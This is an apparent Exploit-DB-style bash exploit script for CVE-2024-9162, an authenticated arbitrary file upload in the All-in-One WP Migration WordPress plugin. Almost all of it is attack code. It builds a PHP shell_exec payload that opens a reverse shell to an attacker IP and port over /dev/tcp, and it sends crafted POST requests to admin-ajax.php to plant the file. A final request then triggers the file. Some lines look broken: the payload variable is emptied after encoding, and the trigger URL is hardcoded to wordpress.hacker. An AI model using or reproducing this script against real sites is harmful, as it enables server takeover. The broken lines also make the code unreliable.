# Exploit Title: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload # Date: 09/29/2024 # Exploit Author: Ryan Kozak https://ryankozak.com # Vendor Homepage: https://servmask.com/ # Version: <= 7.86 # Tested on: 7.86 # CVE : CVE-2024-9162 #!/bin/bash # Show example usage of this exploit script. show_usage () { echo "Example Usage: " echo " ./CVE-2024-9162.sh https://wordpress.hacker PwrqqK3UHQJo 192.168.100.86 4444" } XFILE_NAME=CVE-2024-9162.php # Change if you'd like. XDIRECTORY_NAME=CVE-2024-9162 # Change if you'd like. # Validate required arguments for victim url, secret key, attacker ip and lisening port. if [ "$#" -eq 4 ]; then VICTIM_URL=$1 SECRET_KEY=$2 ATTACKER_IP=$3 ATTACKER_PORT=$4 else show_usage exit 1 fi # Exploit Payload PAYLOAD="shell_exec('bash -c \"/bin/bash -i >& /dev/tcp/$3/$4 0>&1 \" 2>/dev/null');" PAYLOAD=$(echo -n $PAYLOAD | base64) PAYLOAD="" # URL encode the payload before it's sent. PAYLOAD=$(echo $PAYLOAD | jq --slurp --raw-input --raw-output @uri) PRIORITY_INT=30 curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \ --data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \ $"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" PRIORITY_INT=50 curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \ --data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \ $"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" PRIORITY_INT=60 curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \ --data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \ $"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" # TRIGGER THE EXPLOIT CODE, echo "Triggering exploit, check your listener..." curl -k --max-time 0 https://wordpress.hacker/wp-content/plugins/all-in-one-wp-migration/storage/$XDIRECTORY_NAME/$XFILE_NAME